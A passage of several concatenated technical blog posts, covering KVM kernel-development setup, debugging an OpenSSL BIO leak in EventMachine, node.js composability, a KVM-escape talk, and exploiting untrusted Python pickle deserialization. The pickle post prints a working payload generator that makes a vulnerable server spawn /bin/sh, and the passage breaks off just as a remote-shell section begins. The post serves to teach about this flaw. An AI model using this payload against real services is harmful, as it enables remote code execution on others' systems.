The most notable one is that you need to be able to attach to the emulator process at all. In the case of an ssh session, that means the forked sshd child for your connection. sshd drops privileges to match the authenticated user (via setuid(2) and friends), so the emulator process does match the user ID of your user account. However, Linux forbids users from ptrace()ing a process that has undergone a UID transition via setuid, and so we can't attach to that process to steal the master end of the pty.

(The reasoning for this restriction confused me at first, but is perfectly sound: Even though sshd has dropped privileges, it might still contain sensitive information in its heap, such as the machine's ssh private keys. We can't be confident it's truly unprivileged (and thus safe to sketch on) until it's called execve and cleared out all interesting state).

Try it out!

I've tested out reptyr -T a fair bit, but it hasn't gotten broad testing or usage yet. I'd love to hear reports of where it does or doesn't work for you! Try it, and drop me an email or open an issue!

Lightweight Linux Kernel Development With KVM

I don't do a ton of Linux kernel development these days, but I've done a fair bit in the past, and picked up a number of useful techniques for doing kernel development in a relatively painless fashion. This blog post is a writeup of the tools and techniques I use when developing for the Linux kernel. Nothing I write here is "the one way" to do it, but this is a workflow I've found to work for me, that I hope others may find useful. I'd love to hear if anyone has incremental improvements or alternate strategies.


The instructions as-listed assume you're developing an x86_64 kernel, from an x86_64 host (kernel and userspace). I will attempt to mention and explain the tweaks necessary for 32-bit kernels and/or hosts where appropriate, out-of-line. Even if you're running a 32-bit userspace, if you have a 64-bit kernel on the host, it's perfectly possible to develop on a 64-bit guest, following these instructions.

I'm assuming a Debian or Ubuntu host for development. If you're not on one of those platforms, the kvm command-lines should still work, but you may need something other than debootstrap to build your images.

Kernel config

For kernel development, unless I have a specific reason to do otherwise, I use an extremely lightweight .config – no modules (everything is built-in), and minimal driver support – in particular, I use virtio drivers for everything, and disable all other driver support. The advantage of no-modules is that it is extremely easy to boot a VM (no fussing around with an initrd), and a minimal config dramatically reduces build times.

I started with an allnoconfig, and manually enabled the features I need. I recommend you just start with my .config file (for kernel 3.12), but I'll include a detailed list at the end of this post explaining which things I enabled, if you want to construct your own.

(For 32-bit: Just disable CONFIG_64BIT ("64-bit kernel"))

Building a disk image

I use debootstrap to build a minimal Debian userspace, and then transplant that onto a disk image and boot off of that. Here's an annotated sequence of command lines:

# Build a Wheezy chroot. Install an sshd, since it will be handy
# later.
mkdir wheezy
sudo debootstrap wheezy wheezy --include=openssh-server

# Perform some manual cleanup on the resulting chroot:

# Make root passwordless for convenience.
sudo sed -i '/^root/ { s/:x:/::/ }' wheezy/etc/passwd
# Add a getty on the virtio console
echo 'V0:23:respawn:/sbin/getty 115200 hvc0' | sudo tee -a wheezy/etc/inittab
# Automatically bring up eth0 using DHCP
printf '\nauto eth0\niface eth0 inet dhcp\n' | sudo tee -a wheezy/etc/network/interfaces
# Set up my ssh pubkey for root in the VM
sudo mkdir wheezy/root/.ssh/
cat ~/.ssh/id_*.pub | sudo tee wheezy/root/.ssh/authorized_keys

# Build a disk image
dd if=/dev/zero of=wheezy.img bs=1M seek=4095 count=1
mkfs.ext4 -F wheezy.img
sudo mkdir -p /mnt/wheezy
sudo mount -o loop wheezy.img /mnt/wheezy
sudo cp -a wheezy/. /mnt/wheezy/.
sudo umount /mnt/wheezy

# At this point, you can delete the "wheezy" directory. I usually
# keep it around in case I've messed up the VM image and want to
# recreate it.

(For different architectures: You can pass --arch={i386,amd64} to debootstrap to control the architecture of the bootstrapped chroot)

Booting to userspace

At this point, you can boot to a working userspace by using a simple kvm invocation, giving it your disk image (specifying it should be exposed as a virtio device) and your kernel, and telling the kernel to boot from the virtual disk:

kvm -kernel arch/x86/boot/bzImage \
  -drive file=$HOME/vms/wheezy.img,if=virtio \
  -append root=/dev/vda

(For 32-bit: Use qemu-system-i386 to emulate a 32-bit VM, instead)

Configuring networking

The easiest way to get working networking in your VM is to use the KVM user-mode networking driver, which makes KVM set up a virtual LAN and NAT your VM to the outside world. To get ssh access, you can tell KVM to set up a port-forward. Just add these arguments to your command-line:

kvm [...]
  -net nic,model=virtio,macaddr=52:54:00:12:34:56 \
  -net user,hostfwd=tcp:127.0.0.1:4444-:22

The MAC address I've chosen is the default address historically assigned by KVM. It doesn't overly matter what you specify, but you want to be consistent, since if the MAC address changes, Debian will renumber the ethernet device (to eth1, eth2, etc.), potentially screwing up your networking config.

The hostfwd fragment forwards port 4444 on localhost on the host to port 22 in the VM, so you can ssh to your VM on localhost:4444.

If you've followed the setup above (installing openssh-server, configuring /etc/network/interfaces, and adding your pubkey to the image), ssh should Just Work once the VM boots.

Headless operation

By default, KVM will pop up a graphical console for your VM. This is probably more annoying than useful. To get headless operation, add this to your command-line:

kvm [...]
  -append 'root=/dev/vda console=hvc0' \
  -chardev stdio,id=stdio,mux=on,signal=off \
  -device virtio-serial-pci \
  -device virtconsole,chardev=stdio \
  -mon chardev=stdio \
  -display none

Note that the -append here should replace any other -append lines you have; If you've added any extra kernel options of your own, you'll need to merge them all into one -append line.

This will multiplex the KVM console and a virtual console for the VM onto stdout. Type Ctrl-A h to get a help message about switching between them. If everything works right, the kernel console output will appear in your shell, and a getty will run there once you've finished booting.

Note that you may need to wait a few seconds before any output shows up, while the kernel boots itself far enough to connect to the virtual console and redirect output.

(For some reason, using a virtconsole like this is not completely reliable for me – every few boots, the console will just fail to come up, somehow. Let me know if you figure it out…)

Sharing a filesystem tree with the VM

scping file back and forth with your VM image isn't too bad, but it's even easier to directly share a filesystem tree with the VM. To do this, I use a virtio 9P mount. Say I want to share ~/code/linux with the VM. I'd add this to my command-line:

kvm [...]
  -fsdev local,id=fs1,path=$HOME/code/linux,security_model=none \
  -device virtio-9p-pci,fsdev=fs1,mount_tag=host-code

Then, from within the VM, I could run

 mkdir -p /mnt/host
 mount host-code -t 9p /mnt/host

And I'd be sharing the directory back and forth!

A few notes:

  • security_model=none causes the VM to map permissions between the host and the guest as best it can using the qemu process's uid, and ignore errors if it can't (e.g. permission bits will be passed through on files you own, but chowning the file inside the VM will have no effect)

  • If you'd rather, you can use security_model=passthrough, and run qemu as root, to directly map permissions between the host and guest.

  • You can add ,readonly on the -fsdev argument to pass the directory through read-only – the VM will be blocked from writing to it.

Building initrds

Booting to a complete userspace inside the VM is great, and super-convenient for exploration and experimentation, but also comparatively slow. One alternative, which is somewhat limited but super lightweight and flexible, is to build test programs into an initrd, and boot directly into that.

To build an initrd from a directory, you can just run:

( cd my-dir && find . | cpio -o -H newc ) | gzip > initrd.gz

In the most lightweight version, you'll want to build a static binary (gcc -static should suffice), and store it as /init in your initrd. For example:

$ cat hello.c
#include <stdio.h>
#include <unistd.h>
#include <sys/reboot.h>

int main(void) {
    printf("Hello, world!\n");
    reboot(RB_POWER_OFF);   /* running as init, so powering off ends the VM */
    return 0;
}
$ mkdir initrd
$ gcc -o initrd/init -static hello.c
$ ( cd initrd/ && find . | cpio -o -H newc ) | gzip > initrd.gz
1751 blocks
$ kvm -kernel arch/x86/boot/bzImage \
    -initrd initrd.gz \
    -append 'console=hvc0' \
    -chardev stdio,id=stdio,mux=on \
    -device virtio-serial-pci \
    -device virtconsole,chardev=stdio \
    -mon chardev=stdio \
    -display none
input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
Freeing unused kernel memory: 676K (ffffffff81646000 - ffffffff816ef000)
Write protecting the kernel read-only data: 6144k
Freeing unused kernel memory: 1156K (ffff8800012df000 - ffff880001400000)
Freeing unused kernel memory: 1300K (ffff8800014bb000 - ffff880001600000)
Hello, world!
ACPI: Preparing to enter system sleep state S5
reboot: Power down

(For 32-bit: You may need to pass gcc -m32 or gcc -m64 if you want to build binaries for a different bittedness than your host)

Kernel debugging with gdb

Add -s to your KVM command line. Once the VM is running, you can attach gdb via:

$ gdb vmlinux
(gdb) set architecture  i386:x86-64
(gdb) target remote :1234

You can now set breakpoints, inspect memory, single-step, all that goodness, without ever having to think the letters "kgdb".

You can step seamlessly between userspace and kernelspace, although getting symbols for everything may be tricky (Let me know if you figure out a good way to make gdb manage everything). I'm not aware of a good way to use gdb to inspect physical memory, or the virtual address space of non-running processes. If you need that, it may be worth playing with KVM/qemu's own built-in console, although I have no expertise with that myself.

(For 32-bit: You may need "set architecture i386" instead, for a 32-bit target. If your host is 32-bit, you may need the gdb-multiarch package to debug a 64-bit target)

Appendix: Kernel config in detail

The .config file I'm using was generated by starting with make allnoconfig and adding in the following options. I've attached explanations to some of them.

  • CONFIG_BLK_DEV_INITRD For booting test programs in an initrd.
  • CONFIG_BLK_DEV_RAM Required for initrd
  • CONFIG_SMP Nearly every computer is SMP these days, so let's build for testing on SMP.
  • CONFIG_PCI Virtio all runs over fake PCI devices
  • CONFIG_BINFMT_SCRIPT We really need ELF and shebang support.
  • CONFIG_IA32_EMULATION Optional, but being able to run 32-bit binaries can be useful for testing.
  • CONFIG_FILE_LOCKING dpkg and many other essential userspace tools need file locking.
  • CONFIG_NET_9P Virtual 9P networking device
  • CONFIG_VIRTIO_PCI Support virtio PCI devices
  • CONFIG_9P_FS Support 9P-based filesystem exports.
  • CONFIG_EXT4_USE_FOR_EXT23 ext2/3/4 support for the root filesystem
  • CONFIG_TMPFS Needed for udev
  • CONFIG_INOTIFY_USER Needed for udev
  • CONFIG_VIRTIO_BLK Needed for the virtio HDD
  • CONFIG_VIRTIO_CONSOLE Needed for the virtio console
  • CONFIG_DEBUG_INFO_REDUCED Build with debug symbols; _REDUCED gives significantly better build times, but still keeps key symbols around. Drop it if you're going to be doing serious kernel debugging.


  • 2014-09-23 – Added CONFIG_FILE_LOCKING, recommended kvm command instead of qemu, and mention signal=off. Thanks to Martin Kelly for the suggestions

Tracking Down a Memory Leak in Ruby’s EventMachine

At Stripe, we rely heavily on ruby and EventMachine to power various internal and external services. Over the last several months, we've known that one such service suffered from a gradual memory leak, that would cause its memory usage to gradually balloon from a normal ~50MB to multiple gigabytes.

It was easy enough to work around the leak by adding monitoring and restarting the process whenever memory usage grew too large, but we were determined to track down the root cause. Our exploration is a tour through a number of different debugging tools and techniques, so I thought I would share it here.

Checking for ruby-level leaks

One powerful technique for tracking down tough memory leaks is post-mortem analysis. If our program's normal memory footprint is 50MB, and we let it leak until it's using, say, 2GB, 1950/2000 = 97.5% of the program's memory is leaked objects! If we look at a core file (or, even better, a running image in gdb), signs of the leak will be all over the place.

So, we let the program leak, and, when its memory usage got large enough, failed active users over to a secondary server, and attached gdb to the bloated image.

Our first instinct in a situation like this is that our Ruby code is leaking somehow, such as by accidentally keeping a list of every connection it has ever seen. It's easy to investigate this possibility by using gdb, the Ruby C API, and the Ruby internal GC hooks:

(gdb) p rb_eval_string("GC.start")
$1 = 4
(gdb) p rb_eval_string("$gdb_objs = 0")
$2 = 991401552
(gdb) p rb_eval_string("ObjectSpace.each_object {|o| $gdb_objs[o.class] += 1}")
$3 = 84435
(gdb) p rb_eval_string("$stderr.puts($gdb_objs.inspect)")
$4 = 4

Calling rb_eval_string lets us inject arbitrary ruby code into the running ruby process, from within gdb. Using that, we first trigger a GC – making sure that any unreferenced objects are cleaned up – and then walk the Ruby ObjectSpace, building up a census of which Ruby objects exist. Looking at the output and filtering for the top objects, we find:

String => 26399
Array  => 8402
Hash   => 2161
Proc   => 608

Just looking at those numbers, my gut instinct is that nothing looks too out of whack. Running some back-of-the-envelope numbers confirms this instinct:

  • In total, that's about 40,000 objects for those object types.
  • We're looking for a gradual leak, so we expect lots of small objects. Let's guess that "small" is around 1 kilobyte.
  • 40,000 1k objects is only 40MB. Our process is multiple GB at this point, so we are nowhere near explaining our memory usage.

It's possible, of course, that one of those Strings has been growing without bound, and is now billions of characters long, but that feels unlikely. A quick survey of String lengths using ObjectSpace would confirm that, but we didn't even bother at this point.

Searching for C object leaks

So, we've mostly ruled out a Ruby-level leak. What now?

Well, as mentioned, 95+% of our program's memory footprint is leaked objects. So if we just take a random sample of bits of memory, we will find leaked objects with very good probability. We generate a core file in gdb:

(gdb) gcore leak.core
Saved corefile leak.core

And then look at a random page (4k block) of the core file:

$ off=$(($RANDOM % ($(stat -c "%s" leak.core)/4096)))
$ dd if=leak.core bs=4096 skip=$off count=1 | xxd
0000000: 0000 0000 0000 0000 4590 c191 3a71 b2aa  ........E...:q..

Repeating a few times, we notice that most of the samples include what looks to be a repeating pattern:

00000f0: b05e 9b0a 0000 0000 0000 0000 0000 0000  .^..............
0000100: 0000 0000 0000 0000 0100 0000 dcfa 1939  ...............9
0000110: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 d03b a51f 0000 0000  .........;......
0000130: 8000 0000 0000 0000 8100 0000 0000 0000  ................
0000140: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000150: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000160: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000170: 40ef e145 0000 0000 0000 0000 0000 0000  @..E............
0000180: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000190: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001b0: 8000 0000 0000 0000 8100 0000 0000 0000  ................
00001c0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00001d0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
00001e0: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
00001f0: 4062 1047 0000 0000 0000 0000 0000 0000  @b.G............
0000200: 0000 0000 0000 0000 0100 0000 1b7f 0000  ................
0000210: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000220: 0000 0000 0000 0000 e103 0000 0000 0000  ................
0000230: 8000 0000 0000 0000 9100 0000 0000 0000  ................
0000240: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000250: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000260: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000270: 50b0 350b 0000 0000 0000 0000 0000 0000  P.5.............
0000280: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000290: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00002a0: 0000 0000 0000 0000 30de 4027 0000 0000  ........0.@'....
00002b0: 0077 7108 0000 0000 0060 7b97 b4d2 f111  .wq......`{.....
00002c0: 9000 0000 0000 0000 8100 0000 0000 0000  ................
00002d0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00002e0: 0000 0000 0000 0000 0100 0000 0100 0000  ................

Those ffff ffff blocks, repeated every 128 bytes, leap out at me, and 4 out of 5 samples of the core file reveal a similar pattern. It seems probable that we're leaking 128-byte objects of some sort, some field of which is -1 as a signed 32-bit integer, i.e. ffff ffff in hex.

Looking further, we also notice a repeated 00a8 5853 1b7f 0000, two lines before each ffff ffff. If you've stared at too many Linux coredumps, as I have, that number looks suspicious. Interpreted in little-endian, that is 0x00007f1b5358a800, which points near the top of the userspace portion of the address space on an amd64 Linux machine.

In fewer words: It's most likely a pointer.
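
A quick sanity check, decoding those eight bytes as a little-endian 64-bit integer in a Python shell:

>>> import struct
>>> hex(struct.unpack("<Q", bytes.fromhex("00a858531b7f0000"))[0])
'0x7f1b5358a800'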

The presence of an identical pointer in every leaked object suggests that the pointer most likely points to some kind of "type" object or tag, containing information about the type of the leaked object. For instance, if we were leaking Ruby String objects, every one would have an identical pointer to the Ruby object that represents the `String' class. So, let's take a look:

(gdb) x/16gx 0x00007f1b5358a800
0x7f1b5358a800: 0x0000000000000401  0x00007f1b53340f24
0x7f1b5358a810: 0x00007f1b532c7780  0x00007f1b532c7690
0x7f1b5358a820: 0x00007f1b532c7880  0x00007f1b532c78c0
0x7f1b5358a830: 0x00007f1b532c74f0  0x00007f1b532c74c0
0x7f1b5358a840: 0x00007f1b532c7470  0x0000000000000000
0x7f1b5358a850: 0x0000000000000000  0x0000000000000000
0x7f1b5358a860: 0x0000000000000406  0x00007f1b5332a549
0x7f1b5358a870: 0x00007f1b532c7a40  0x00007f1b532c7a30

The first field, 0x401, contains only two bits set, suggesting some kind of flag field. After that, there are a whole bunch of pointers. Let's chase the first one:

(gdb) x/s 0x00007f1b53340f24
0x00007f1b53340f24: "memory buffer"

Great. So we are leaking … memory buffers. Thanks.

But this is actually fantastically informative, especially coupled with the one other piece of information we have: /proc/<pid>/maps for the target program, which tells us which files are mapped into our program at which addresses. Searching that for the target address, we find:

7f1b53206000-7f1b5336c000 r-xp 00000000 08:01 16697      /lib/

0x7f1b53206000 <= 0x7f1b5358a800 < 0x7f1b5336c000, so this mapping contains our "type" object. libcrypto is the library containing OpenSSL's cryptographic routines, so we are leaking some sort of OpenSSL buffer object. This is real progress.

I am not overly familiar with libssl/libcrypto, so let's go to the source to learn more:

$ apt-get source libssl0.9.8
$ cd openssl*
$ grep -r "memory buffer" .
./crypto/err/err_str.c:{ERR_PACK(ERR_LIB_BUF,0,0)       ,"memory buffer routines"},
./crypto/asn1/asn1.h: * be inserted in the memory buffer
./crypto/bio/bss_mem.c: "memory buffer",
./README:        sockets, socket accept, socket connect, memory buffer, buffering, SSL
./doc/ssleay.txt:-  BIO_s_mem()  memory buffer - a read/write byte array that
./test/times:talks both sides of the SSL protocol via a non-blocking memory buffer

Only one of those is a string constant, so we go browse ./crypto/bio/bss_mem.c and read the docs (bio(3) and buffer(3)) a bit. Sparing you all the details, we learn:

  • OpenSSL uses the BIO structure as a generic abstraction around any kind of source or sink of data that can be read or written to.
  • A BIO has a pointer to a BIO_METHOD, which essentially contains a small amount of metadata and a vtable, describing what specific kind of BIO this is, and how to interact with it. The second field in a BIO_METHOD is a char * pointing at a string holding the name of this type (see the sketch just after this list).
  • One of the common types of BIOs is the mem BIO, backed directly by an in-memory buffer (a BUF_MEM). The BIO_METHOD for memory BIOs has the type tag "memory buffer".
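
To make the layout concrete, here is roughly what a BIO_METHOD looks like in C. This is an abridged sketch in the spirit of OpenSSL 0.9.8's bio.h, not a verbatim copy, and the exact vtable members shown are from memory; the important part is the shape visible in the gdb dump above: a type tag, a name pointer (our "memory buffer" string), and then a run of function pointers.

/* Abridged sketch of OpenSSL's BIO_METHOD (see openssl/bio.h for the real
 * definition); the vtable members listed here are illustrative. */
typedef struct bio_method_st {
    int type;                                 /* 0x401 is the mem BIO's type tag */
    const char *name;                         /* -> "memory buffer"              */
    int (*bwrite)(BIO *, const char *, int);  /* the vtable: write/read/ctrl...  */
    int (*bread)(BIO *, char *, int);
    long (*ctrl)(BIO *, int, long, void *);
    int (*create)(BIO *);
    int (*destroy)(BIO *);
    /* ... */
} BIO_METHOD;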

So, it appears we are leaking BIO objects. Interestingly, we don't actually seem to be leaking the underlying memory buffers, just the BIO struct that contains the metadata about the buffer.

Tracing the source

This kind of leak has to be in some C code somewhere. Clearly nothing in pure Ruby code should be able to do this. The server in question contains no C extensions we wrote, so it's probably in some third-party library we use.

A leak in OpenSSL itself is certainly possible, but OpenSSL is very widely used and quite mature, so let's assume (hope) that our leak is not there, for now.

That leaves EventMachine as the most likely culprit. Our program uses SSL heavily via the EventMachine APIs, and we do know that EventMachine contains a bunch of C/C++, which, to be frank, does not have a sterling reputation.

So, we pull up an EventMachine checkout. There are a number of ways to construct a new BIO, but the most basic and common seems to be BIO_new, sensibly enough. So let's look for that:

$ git grep BIO_new
ext/rubymain.cpp:       out = BIO_new(BIO_s_mem());
ext/ssl.cpp:    BIO *bio = BIO_new_mem_buf (PrivateMaterials, -1);
ext/ssl.cpp:    pbioRead = BIO_new (BIO_s_mem());
ext/ssl.cpp:    pbioWrite = BIO_new (BIO_s_mem());
ext/ssl.cpp:    out = BIO_new(BIO_s_mem());

Great: there are some calls (so it could be one of them!), but not too many (so we can reasonably audit them all).

Starting from the top, we find, in ext/rubymain.cpp:

static VALUE t_get_peer_cert (VALUE self, VALUE signature)
{
    VALUE ret = Qnil;
    X509 *cert = NULL;
    BUF_MEM *buf;
    BIO *out;

    cert = evma_get_peer_cert (NUM2ULONG (signature));

    if (cert != NULL) {
        out = BIO_new(BIO_s_mem());
        PEM_write_bio_X509(out, cert);
        BIO_get_mem_ptr(out, &buf);
        ret = rb_str_new(buf->data, buf->length);
        BUF_MEM_free(buf);
    }

    return ret;
}

The OpenSSL APIs are less than perfectly self-descriptive, but it's not too hard to puzzle out what's going on here:

We first construct a new BIO backed by a memory buffer:

out = BIO_new(BIO_s_mem());

We write the certificate text into that BIO:

PEM_write_bio_X509(out, cert);

Get a pointer to the underlying BUF_MEM:

BIO_get_mem_ptr(out, &buf);

Convert it to a Ruby string:

ret = rb_str_new(buf->data, buf->length);

And then free the memory:

BUF_MEM_free(buf);

But we've called the wrong free function! We free buf, which is the underlying BUF_MEM, but we leak out, the BIO we allocated to wrap it. This is exactly the kind of leak we saw in our core dump!

Continuing our audit, we find the exact same bug in ssl_verify_wrapper in ssl.cpp. Reading the code, we learn that t_get_peer_cert is called by the Ruby function get_peer_cert, used to retrieve the peer certificate from a TLS connection, and that ssl_verify_wrapper is called if you pass :verify_peer => true to start_tls, to convert the certificate into a Ruby string for passing to the ssl_verify_peer hook.

So, any time you made a TLS or SSL connection with EventMachine and verified the peer certificate, EventMachine leaked 128 bytes! Since it's presumably pretty rare to make a large number of SSL connections from a single Ruby process, it's not totally surprising that no one had caught this before.

Having found the issue, the fix was simple, and was promptly merged upstream.
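
For reference, the shape of the fix is just to free the BIO itself once we're done with it. Here's a minimal sketch (not necessarily the exact patch that was merged; it assumes the memory BIO keeps its default close flag, in which case BIO_free also releases the underlying BUF_MEM):

if (cert != NULL) {
    out = BIO_new(BIO_s_mem());
    PEM_write_bio_X509(out, cert);
    BIO_get_mem_ptr(out, &buf);
    ret = rb_str_new(buf->data, buf->length);   /* rb_str_new copies the data */
    BIO_free(out);  /* frees the BIO and, with the default close flag, its BUF_MEM */
}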

Why node.js Is Cool (It’s Not About Performance)

For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech! I myself have given node.js a lot of shit, often involving the phrase "explicit continuation-passing style."

Most of the arguments I've seen seem to center around whether node.js is "scalable" or high-performance, and the relative merits of single-threaded event loops versus threading for scaling out, or other such noise. Or how to best write a Fibonacci server in node.js (wat?).

I am going to completely ignore all of that (and I think you should, too!), and argue that node.js is in fact on to something really cool, and is worth using and thinking about, but for a reason that has absolutely nothing to do with scalability or performance.

The Problem

node.js is cool because it solves a problem shared by virtually every mainstream language. That problem is the fact that, as long as "ordinary" blocking code is the default, it is difficult and unnatural to write networked code in a way that lets it be combined with other networked code while still allowing the pieces to interact.

In most languages/environments – virtually every other language people use today – when you write networked code, you can either make it fully blocking itself, and implement your own main loop – which is almost always easiest – or you can pick your favorite event loop library (you probably have half a dozen choices), and write your code around that. If you do the latter, not only will your code likely be more awkward than if you chose the blocking main loop approach, but your only reward for the effort is that your code is combinable with the small fraction of other code that also chose the same event loop library.

The upshot of this situation is that if you pick a couple of random networked libraries written by different people – let's say, an HTTP server, a Twitter client, and an IRC client, for example – and want to combine them – maybe you want a Twitter <-> IRC bridge with a web-based admin panel – you will end up at best having to write some awkward glue code, and at worst doing something truly hackish in order to make them communicate at all.

(In case you're not convinced about the existence or scope of this problem, you can detour ahead to the optional example of how this problem manifests with typical Python libraries.)

Enter node.js

node.js solves this problem, somewhat paradoxically, by reducing the number of options available to developers. By having a built-in event loop, and by making that event loop the default way to accomplish virtually anything at all (e.g. all of the builtin IO functions work asynchronously on the same event loop), node.js provides a very strong pressure to write networked code in a certain way. The upshot of this pressure is that, since essentially every node.js library works this way, you can pick and choose arbitrary node.js libraries and combine them in the same program, without even having to think about the fact that you're doing so.

node.js is cool, then, not for any performance or scalability reasons, but because it makes composable networked components the default.

Concluding Notes

An interesting point here is that there are not really any fundamental differences between what you can do in Python and in node.js. The Twisted project, for example, is basically an attempt to implement the node.js ideology in Python (yes, I'm being terribly anachronistic describing it that way). Twisted, however, has a fairly steep learning curve, and "feels" unnatural to developers used to writing "normal" Python, and so relatively few libraries get written for the Twisted environment, compared to the rest of the Python ecosystem. Twisted suffers from the fact that the Python language and Python community are not set up to make Twisted the default way to do things.

The key is that node.js makes it, both technically and socially, easier to write code in this composable way than not to do so. The built-in event loop and nonblocking primitives make it technically easy, and the social culture that has grown up around it discourages libraries that don't work this way, so libraries that attempt to just block for IO are looked down on and are unlikely to thrive and gain adoption and development resources.

I'm also not ignoring the downside of the node.js style – the potentially convoluted callback-based style, the risk of bringing the whole world to a halt with an accidental blocking call, the single-threaded model that makes it hard to effectively exploit multiple cores. node.js definitely makes you do more work than you might otherwise have to, in many circumstances. But the key is, in exchange for this work, you get something really cool – and something much more valuable, in my opinion, than nebulous performance gains.

I also don't want to claim that node.js is the only system, or the only technical approach, that makes this property possible. But node.js is the most successful such system I know of, and that's worth at least as much as the technical possibility – what's the use of being able to combine third-party libraries, if no one has written anything worth using in the first place?

And similarly, while the single-threaded callback model may not be the best possible model, it seems to have hit a sweet spot in terms of what developers are willing to put up with. Certainly, people are writing node.js code like mad – check out the npm registry for a partial list.

So, node.js is not magic, and it definitely doesn't cure cancer. But there is something here worth looking at. The next time you need to glue some unrelated networked services together, give node.js a shot – I think you'll like it. And if you're still not convinced, glue a quick HTTP frontend onto whatever you've created. I promise you'll be shocked by how easy it is.

Postscript - A Python Example

As an optional addendum, here's a step-by-step discussion of just how bad the situation is in most other languages.

Let's imagine we want to write a trivial Jabber -> IRC bridge: A bot that lurks in an IRC channel, and signs on to Jabber, and sends all the messages it receives on Jabber into the IRC channel. This is the kind of simple problem that can be described in one sentence, and sounds like it should take all of 20 lines of code, but actually turns out to be rather a nuisance.

Python has, by this point, a great library ecosystem, so we happily start googling, and find the plausible looking python-irclib and xmpppy libraries. Great. So, what does code in each of those look like? Well, in python-irclib, we construct a subclass of SingleServerIRCBot, and call the start function, which runs the IRC main loop:

bot = MyBot(channel, nickname, server, port)
bot.start()

And in xmpppy, we construct an xmpp.Client object, and call Client.Process in a loop, with a timeout:

conn = xmpp.Client(server)
# connect to the server
while True:
    conn.Process(1)   # poll with a short timeout; the value here is illustrative

Ok, so, we launch a thread for each one, and a few minutes of fumbling later, we're connected to both Jabber and IRC. So far, so good. We're using Python's threads, which will inevitably bring us a world of pain, but I'll ignore that for now, since a better threading implementation could fix most of the pain.

But now, what do we do when we receive a Jabber message? We want to send a message out the python-irclib instance, but how do we do that? python-irclib isn't thread safe, so we can't just call .send() from the Jabber thread. Ok, so we add in a Queue.Queue, and have the Jabber thread push messages onto it.

Now we just need to make the IRC thread fetch messages from this queue. But how do we do that? The IRC thread is blocked somewhere deep inside python-irclib, waiting for network traffic. How do we wake it up to read messages from the queue? The easiest way is to switch from calling start to calling process_once in a loop with a short timeout.

This will work, and we'll eventually get something working, but now we're forced into polling, with all the annoying latency/CPU tradeoffs that entails, and also half of our code so far has just been spent gluing these two libraries together.

In node.js, on the other hand, we'd just instantiate client objects for both protocols, set up some event handlers, and … well, that's about it. Because everything's hooked into the same main loop, they'll Just Work together, and because we're all running single-threaded, we can mostly just communicate directly between the two libraries without having to think too hard about race conditions or anything.

The point, of course, is not that it is impossible to write this program in Python. It is, and I've done it, and it's not that terrible. But any option you take will involve some annoying tradeoffs, and will involve making lots of irrelevant plumbing decisions about how to make your pieces play well together. And compared to all that, node.js feels like a breeze.

BlackHat/DEFCON 2011 Talk: Breaking Out of KVM

I've posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux.

Virtunoid: Breaking out of KVM from Nelson Elhage

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you'll need to get the exploit up and running in a local test environment, if you're so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I'm also going to clean that up and release it, but don't expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I'd met online and others I hadn't. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Exploiting Misuse of Python’s “Pickle”

If you program in Python, you're probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you're also familiar with the warning printed prominently near the start of pickle's documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it's interesting if you haven't seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):

     # Code to actually parse incoming data according to an
     #  internal state machine

     # If we just finished receiving headers, call verifyAuth() to
     #  check authentication

  def verifyAuth(self, headers):
     try:
       token = cPickle.loads(base64.b64decode(headers['AuthToken']))
       if not check_hmac(token['signature'], token['data'], getSecretKey()):
         raise AuthenticationFailed
       self.secure_data = token['data']
     except:
       raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python's subprocess.Popen objects – if we can trick the target into instantiating one of those, they'll be executing arbitrary commands for us! To generate such a pickle, however, we can't just create a Popen object and pickle it; For various mostly-obvious reasons, that won't work. We could read up on the "pickle" format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

